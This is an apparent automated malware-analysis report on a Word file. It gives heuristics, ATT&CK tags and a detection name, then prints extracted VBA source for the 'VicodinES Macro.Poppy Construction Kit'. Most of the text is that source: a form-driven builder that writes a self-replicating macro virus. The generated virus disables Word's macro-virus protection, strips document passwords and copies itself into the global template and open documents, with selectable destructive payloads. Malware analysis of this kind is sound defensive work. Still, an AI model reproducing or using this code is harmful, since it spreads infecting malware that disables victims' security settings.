MALICIOUS
Risk Score: 228
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and Auto_Close, indicating malicious intent. The document body presents a deceptive End-User License Agreement for a tool that explicitly states it is designed to create macro viruses. The presence of ClamAV detection on an extracted artifact further supports its malicious nature.
Heuristics 5
- VBA macros detected [medium] (2 related findings)
  OLE_VBA_MACROS: Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering [critical]
  OLE_VBA_MACRO_VIRUS_REPLICATION: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: Print #hFile, " .VirusProtection = False"
- AutoOpen macro [low]
  OLE_VBA_AUTOOPEN: AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Heap-spray pattern detected [high]
  SC_HEAP_SPRAY: Repeated 0x06 bytes found
  Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'push' is 79% of instructions — a sled or padding/filler run, not program logic).
- Legacy WordBasic macro-virus markers [high]
  OLE_LEGACY_WORDBASIC_MACRO_VIRUS: OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 51568 bytes |

SHA-256: ba3f75421c073e960542ca2e70f62fd1ea3cf048d3a7b3bb7db8eb15259a3d3f
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "WelcomeFrm"
Attribute VB_Base = "0{87F3A4A7-87A5-11D1-9F3A-444553540000}{87F3A471-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Begin1Btn_Click()
WelcomeFrm.Hide
PoppyStartFrm.Show
End Sub
Private Sub ExitBtn_Click()
ActiveDocument.Close
End
End Sub
Private Sub Image1_Click()
MsgBox "Don't click on me you IDIOT!!", vbExclamation, "The Narkotic Network"
MsgBox "No info here but keep trying :) ... there are lots of hidden hints and bits of information.", vbExclamation, "The Narkotic Network"
End Sub
Attribute VB_Name = "VMPCK"
Public Payload As Integer
Public Trigger As Integer
Public Noise As Integer
Public Stealth As Integer
Public Message As Integer
Public Skip As Integer
Public AO As Boolean 'AutoOpen
Public AC As Boolean 'AutoClose
Public AEXIT As Boolean 'AutoExit
Public AEXEC As Boolean 'AutoExec
Public FP As Boolean 'File|Print
Public FS As Boolean 'File|Save
Public FC As Boolean 'File|Close
Public FE As Boolean 'File|Exit
Public TOOL As Boolean 'Tools|Options
Public FN As Boolean 'File|New
Public ROR_X As Boolean 'Read-Only Remover
Public ID_X As Boolean 'Icon Disco
Public DP_X As Boolean 'Document Properties
Sub AutoOpen()
Skip = 0
Payload = 0
Trigger = 0
Noise = 0
Stealth = 0
Message = 0
WelcomeFrm.Show
End Sub
Sub vBuildPoppy(strFile As String)
Dim hFile As Long
Randomize
ID1 = Int(Rnd * 9999)
ID2 = Int(Rnd * 9999)
ID3 = ID1 - ID2
hFile = FreeFile
Open strFile For Output Access Write As hFile
' H E A D E R & S T A R T OF Sub MacPoppy
Print #hFile, "Attribute VB_Name = ""MacPoppy"""
Print #hFile, "Sub MacPoppy()"
Print #hFile, " "
Print #hFile, " 'Produced by The VicodinES Macro.Poppy Construction Kit"
Print #hFile, " '======================================================"
Print #hFile, " 'Code Written by VicodinES"
Print #hFile, " 'Poppy ID : " & ID1 & ID2 & ID3
Print #hFile, " "
Print #hFile, " "
Print #hFile, "On Error Resume Next"
' Click The Basics
Print #hFile, "With Options"
Print #hFile, " .ConfirmConversions = False"
Print #hFile, " .VirusProtection = False"
Print #hFile, " .SaveNormalPrompt = False"
Print #hFile, "End With"
Print #hFile, "With ActiveDocument"
Print #hFile, " .ReadOnlyRecommended = False"
Print #hFile, " .Password = """
Print #hFile, " .WritePassword = """
Print #hFile, "End With"
' Start of Infection Routine
Print #hFile, "trip = 0"
Print #hFile, "what$ = UCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))"
' Check Read-Only Remover Status
If ROR_X = True Then
Print #hFile, "msfile$ = ""c:\windows\startm~1\programs\startup\msfile.bat"""
Print #hFile, "nfat = GetAttr(NormalTemplate.FullName)"
Print #hFile, "If nfat = vbReadOnly Then Call vBitchES(msfile$)"
Print #hFile, "If nfat = vbReadOnly + vbArchive Then Call vBitchES(msfile$)"
Print #hFile, "If nfat = vbReadOnly Then GoTo fuckoff"
Print #hFile, "If nfat = vbReadOnly + vbArchive Then GoTo fuckoff"
End If
' Continue Infection Routine
Print #hFile, "If what$ = UCase(NormalTemplate) Then trip = 1"
Print #hFile, "If trip = 1 Then one$ = NormalTemplate.FullName Else one$ = ActiveDocument.FullName"
Print #hFile, "If trip = 1 Then two$ = ActiveDocument.FullName Else two$ = NormalTemplate.FullName"
Print #hFile, " "
Print #hFile, "Application.OrganizerCopy Source:=one$, Destination:=two$, Name:=""MacPoppy"", Object:=wdOrganizerObjectProjectItems"
Print #hFile, " "
Print #hFile, "If trip = 1 Then If Skip <> 1 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName"
Print #hFile, "If trip = 0 Then"
Print #hFile, " If NormalTemplate.Saved = False Then NormalTemplate.Save"
Close hFile
End Sub
Attribute VB_Name = "PoppyStartFrm"
Attribute VB_Base = "0{87F3A4AB-87A5-11D1-9F3A-444553540000}{87F3A479-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
PoppyStartFrm.Hide
PoppyOptionsFrm.Show
End Sub
Private Sub ExitBtn_Click()
ActiveDocument.Close
End
End Sub
Private Sub Image1_Click()
MsgBox "Hello I'm Vic the Macro.Poppy bug...", vbOKOnly, "meep meep"
End Sub
Private Sub Image2_Click()
MsgBox "Hello I'm Vic the Macro.Poppy bug...", vbOKOnly, "meep meep"
End Sub
Private Sub InfoBtn_Click()
PoppyStartFrm.Hide
PoppyInfoFrm.Show
End Sub
Private Sub Label1_Click()
MsgBox "I'm sorry but you can't get a look at my code for this kit... if you really want it you can ask for it at vcru@hotmail.com", vbCritical, "The Narkotic Network"
End Sub
Private Sub Label2_Click()
MsgBox "I'm sorry but you can't get a look at my code for this kit... if you really want it you can ask for it at vcru@hotmail.com", vbCritical, "The Narkotic Network"
End Sub
Private Sub UserForm_Click()
MsgBox "I'm sorry but you can't get a look at my code for this kit... if you really want it you can ask for it at vcru@hotmail.com", vbCritical, "The Narkotic Network"
End Sub
Attribute VB_Name = "PoppyOptionsFrm"
Attribute VB_Base = "0{87F3A4AF-87A5-11D1-9F3A-444553540000}{87F3A47B-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
PoppyOptionsFrm.Hide
MakeFrm.Show
End Sub
Private Sub CommandButton2_Click()
PoppyOptionsFrm.Hide
MethodOfInfectionFrm.Show
End Sub
Private Sub CommandButton3_Click()
PoppyOptionsFrm.Hide
NoiseLevelFrm.Show
End Sub
Private Sub CommandButton4_Click()
PoppyOptionsFrm.Hide
StealthFrm.Show
End Sub
Private Sub CommandButton5_Click()
PoppyOptionsFrm.Hide
PayloadFrm.Show
End Sub
Private Sub CommandButton7_Click()
PoppyOptionsFrm.Hide
MsgBoxFrm.Show
End Sub
Private Sub CommandButton8_Click()
PoppyOptionsFrm.Hide
ExtrasFrm.Show
End Sub
Private Sub ExitBtn_Click()
ActiveDocument.Close
End
End Sub
Attribute VB_Name = "MethodOfInfectionFrm"
Attribute VB_Base = "0{87F3A4BB-87A5-11D1-9F3A-444553540000}{87F3A47D-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub AutoCloseBtn_Click()
If AutoCloseBtn = True Then AC = True
End Sub
Private Sub AutoExecBtn_Click()
If AutoExecBtn = True Then AEXEC = True
End Sub
Private Sub AutoExitBtn_Click()
If AutoExitBtn = True Then AEXIT = True
End Sub
Private Sub AutoOpenBtn_Click()
If AutoOpenBtn = True Then AO = True
End Sub
Private Sub CommandButton1_Click()
MethodOfInfectionFrm.Hide
PoppyOptionsFrm.Show
End Sub
Private Sub ExitBtn_Click()
ActiveDocument.Close
End
End Sub
Private Sub FileCloseBtn_Click()
If FileCloseBtn = True Then FC = True
End Sub
Private Sub FileExitBtn_Click()
If FileExitBtn = True Then FE = True
End Sub
Private Sub FileNewBtn_Click()
If FileNewBtn = True Then FN = True
End Sub
Private Sub FilePrintBtn_Click()
If FilePrintBtn = True Then FP = True
End Sub
Private Sub FileSaveBtn_Click()
If FileSaveBtn = True Then FS = True
End Sub
Private Sub ToolsOptionsBtn_Click()
If ToolsOptionsBtn = True Then TOLL = True
End Sub
Attribute VB_Name = "NoiseLevelFrm"
Attribute VB_Base = "0{87F3A4BF-87A5-11D1-9F3A-444553540000}{87F3A47F-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
NoiseLevelFrm.Hide
PoppyOptionsFrm.Show
End Sub
Private Sub CommandButton18_Click()
NoiseInfoFrm.Show
End Sub
Private Sub ExitBtn_Click()
ActiveDocument.Close
End
End Sub
Private Sub OptionButton1_Click()
If OptionButton1.Value = True Then Noise = 0
End Sub
Private Sub OptionButton2_Click()
If OptionButton2.Value = True Then Noise = 1
End Sub
Private Sub OptionButton3_Click()
If OptionButton3.Value = True Then Noise = 3
End Sub
Private Sub OptionButton4_Click()
If OptionButton4.Value = True Then Noise = 2
End Sub
Private Sub OptionButton5_Click()
If OptionButton5.Value = True Then Noise = 5
End Sub
Private Sub OptionButton6_Click()
If OptionButton6.Value = True Then Noise = 4
End Sub
Private Sub UserForm_Click()
End Sub
Attribute VB_Name = "StealthFrm"
Attribute VB_Base = "0{87F3A4C3-87A5-11D1-9F3A-444553540000}{87F3A481-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub BasicStealthBtn_Click()
If BasicStealthBtn.Value = True Then Stealth = 1
End Sub
Private Sub CommandButton1_Click()
StealthFrm.Hide
PoppyOptionsFrm.Show
End Sub
Private Sub ExitBtn_Click()
ActiveDocument.Close
End
End Sub
Private Sub InfectionStealthBtn_Click()
If InfectionStealthBtn.Value = True Then Stealth = 2
End Sub
Private Sub NoStealthBtn_Click()
If NoStealthBtn.Value = True Then Stealth = 0
End Sub
Attribute VB_Name = "PoppyInfoFrm"
Attribute VB_Base = "0{87F3A4C7-87A5-11D1-9F3A-444553540000}{87F3A483-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
PoppyInfoFrm.Hide
PoppyStartFrm.Show
End Sub
Private Sub CommandButton2_Click()
NarkoticFrm.Show
End Sub
Attribute VB_Name = "NarkoticFrm"
Attribute VB_Base = "0{87F3A4CB-87A5-11D1-9F3A-444553540000}{87F3A485-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Image1_Click()
MsgBox "Greetz to Cicatrix and Spanska !!", vbInformation, "The Narkotic Network"
MsgBox "If you want to contact VicodinES or the Narkotic Network then write to vcru@hotmail.com", vbInformation, "The Narkotic Network"
End Sub
Private Sub MailBtn_Click()
ActiveDocument.FollowHyperlink Address:= _
"mailto:vcru@hotmail.com" _
, NewWindow:=False, AddHistory:=False
End Sub
Attribute VB_Name = "ExtrasFrm"
Attribute VB_Base = "0{87F3A4B7-87A5-11D1-9F3A-444553540000}{87F3A487-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
ExtrasFrm.Hide
PoppyOptionsFrm.Show
End Sub
Private Sub CommandButton2_Click()
ExtrasFrm.Hide
ExtrasInfoFrm.Show
End Sub
Private Sub CommandButton3_Click()
RemoveROFrm.Show
End Sub
Private Sub CommandButton4_Click()
IconDiscoFrm.Show
End Sub
Private Sub CommandButton6_Click()
ChngDocPropFrm.Show
End Sub
Private Sub ExitBtn_Click()
ActiveDocument.Close
End
End Sub
Private Sub DPBox_Click()
If DPBox = True Then DP_X = True
End Sub
Private Sub IDBox_Click()
If IDBox = True Then ID_X = True
End Sub
Private Sub RORBox_Click()
If RORBox = True Then ROR_X = True
End Sub
Attribute VB_Name = "RemoveROFrm"
Attribute VB_Base = "0{87F3A4CF-87A5-11D1-9F3A-444553540000}{87F3A489-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
RemoveROFrm.Hide
End Sub
Private Sub Label1_Click()
MsgBox "This code was originally released in the Blee.Poppy macro virus family.", vbInformation, "The Narkotic Network"
MsgBox "The Blee.Poppy family has been ID'd as W97M/Blee", vbInformation, "The Narkotic Network"
End Sub
Private Sub UserForm_Click()
MsgBox "This code was originally released in the Blee.Poppy macro virus family.", vbInformation, "The Narkotic Network"
MsgBox "The Blee.Poppy family has been ID'd as W97M/Blee", vbInformation, "The Narkotic Network"
End Sub
Attribute VB_Name = "ExtrasInfoFrm"
Attribute VB_Base = "0{87F3A4D3-87A5-11D1-9F3A-444553540000}{87F3A48B-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
ExtrasInfoFrm.Hide
ExtrasFrm.Show
End Sub
Attribute VB_Name = "IconDiscoFrm"
Attribute VB_Base = "0{87F3A4D7-87A5-11D1-9F3A-444553540000}{87F3A48D-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
IconDiscoFrm.Hide
End Sub
Private Sub Label1_Click()
MsgBox "This code was originally released in the Disco.Poppy macro virus family.", vbInformation, "The Narkotic Network"
MsgBox "The Disco.Poppy family has been ID'd as W97M/Disco", vbInformation, "The Narkotic Network"
End Sub
Private Sub UserForm_Click()
MsgBox "This code was originally released in the Disco.Poppy macro virus family.", vbInformation, "The Narkotic Network"
MsgBox "The Disco.Poppy family has been ID'd as W97M/Disco", vbInformation, "The Narkotic Network"
End Sub
Attribute VB_Name = "ChngDocPropFrm"
Attribute VB_Base = "0{87F3A4DB-87A5-11D1-9F3A-444553540000}{87F3A48F-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
ActiveDocument.Close
End
End Sub
Private Sub ExitBtn_Click()
ChngDocPropFrm.Hide
End Sub
Private Sub InfoBtn_Click()
ChngDocPropInfoFrm.Show
End Sub
Private Sub Label1_Click()
MsgBox "This code was originally released in the Blee.Poppy and Cartman.Poppy macro virus family.", vbInformation, "The Narkotic Network"
End Sub
Private Sub UserForm_Click()
MsgBox "This code was originally released in the Blee.Poppy and Cartman.Poppy macro virus family.", vbInformation, "The Narkotic Network"
End Sub
Attribute VB_Name = "PayloadFrm"
Attribute VB_Base = "0{87F3A4DF-87A5-11D1-9F3A-444553540000}{87F3A491-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
PayloadFrm.Hide
PoppyOptionsFrm.Show
End Sub
Private Sub ExitBtn_Click()
ActiveDocument.Close
End
End Sub
Private Sub CommandButton16_Click()
RandomInfoFrm.Show
End Sub
Private Sub CommandButton17_Click()
DateTimeInfoFrm.Show
End Sub
Private Sub CommandButton18_Click()
StealthActiveFrm.Show
End Sub
Private Sub CommandButton19_Click()
NoPayloadFrm.Show
End Sub
Private Sub NoPayloadBtn_Click()
If NoPayloadBtn = True Then Trigger = 0
If NoPayloadBtn = True Then Paylod = 0
End Sub
Private Sub PDateBtn_Click()
If PDateBtn = True Then Trigger = 1
End Sub
Private Sub PPCloseWBtn_Click()
If PPCloseBtn = True Then Payload = 3
End Sub
Private Sub PPCloseWrdBtn_Click()
If PPCloseWrdBtn = True Then Payload = 4
End Sub
Private Sub PPKillBtn_Click()
If PPKillBtn = True Then Payload = 6
End Sub
Private Sub PPPrintBtn_Click()
If PPPrintBtn = True Then Payload = 5
End Sub
Private Sub PPReplaceBtn_Click()
If PPReplaceBtn = True Then Payload = 2
End Sub
Private Sub PPWebBtn_Click()
If PPWebBtn = True Then Payload = 1
End Sub
Private Sub PRandomBtn_Click()
If PRandomBtn = True Then Trigger = 2
End Sub
Private Sub PStealthBtn_Click()
If PStealthBtn = True Then Trigger = 3
End Sub
Attribute VB_Name = "NoiseInfoFrm"
Attribute VB_Base = "0{87F3A4E3-87A5-11D1-9F3A-444553540000}{87F3A493-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
NoiseInfoFrm.Hide
End Sub
Attribute VB_Name = "DateTimeInfoFrm"
Attribute VB_Base = "0{87F3A4E7-87A5-11D1-9F3A-444553540000}{87F3A495-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
DateTimeInfoFrm.Hide
End Sub
Attribute VB_Name = "RandomInfoFrm"
Attribute VB_Base = "0{87F3A4EB-87A5-11D1-9F3A-444553540000}{87F3A497-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
RandomInfoFrm.Hide
End Sub
Attribute VB_Name = "StealthActiveFrm"
Attribute VB_Base = "0{87F3A4EF-87A5-11D1-9F3A-444553540000}{87F3A499-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
StealthActiveFrm.Hide
End Sub
Attribute VB_Name = "NoPayloadFrm"
Attribute VB_Base = "0{87F3A4F3-87A5-11D1-9F3A-444553540000}{87F3A49B-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ExitBtn_Click()
NoPayloadFrm.Hide
End Sub
Attribute VB_Name = "MakeFrm"
Attribute VB_Base = "0{87F3A4B3-87A5-11D1-9F3A-444553540000}{87F3A49D-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub ForgetBtn_Click()
MakeFrm.Hide
PoppyOptionsFrm.Show
End Sub
Private Sub MakeBtn_Click()
Call vBuildPoppy("c:\windows\desktop\macpoppy.bas")
End Sub
Attribute VB_Name = "MsgBoxFrm"
Attribute VB_Base = "0{87F3A4F7-87A5-11D1-9F3A-444553540000}{87F3A49F-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub BdaySettingsBtn_Click()
BdaySettingsFrm.Show
End Sub
Private Sub CommandButton1_Click()
MsgBoxFrm.Hide
PoppyOptionsFrm.Show
End Sub
Attribute VB_Name = "QuickExitBtn"
Attribute VB_Base = "0{87F3A4FB-87A5-11D1-9F3A-444553540000}{87F3A4A1-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
ActiveDocument.Close
End
End Sub
Attribute VB_Name = "BdaySettingsFrm"
Attribute VB_Base = "0{87F3A4FF-87A5-11D1-9F3A-444553540000}{87F3A4A3-87A5-11D1-9F3A-444553540000}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
BdaySettingsFrm.Hide
End Sub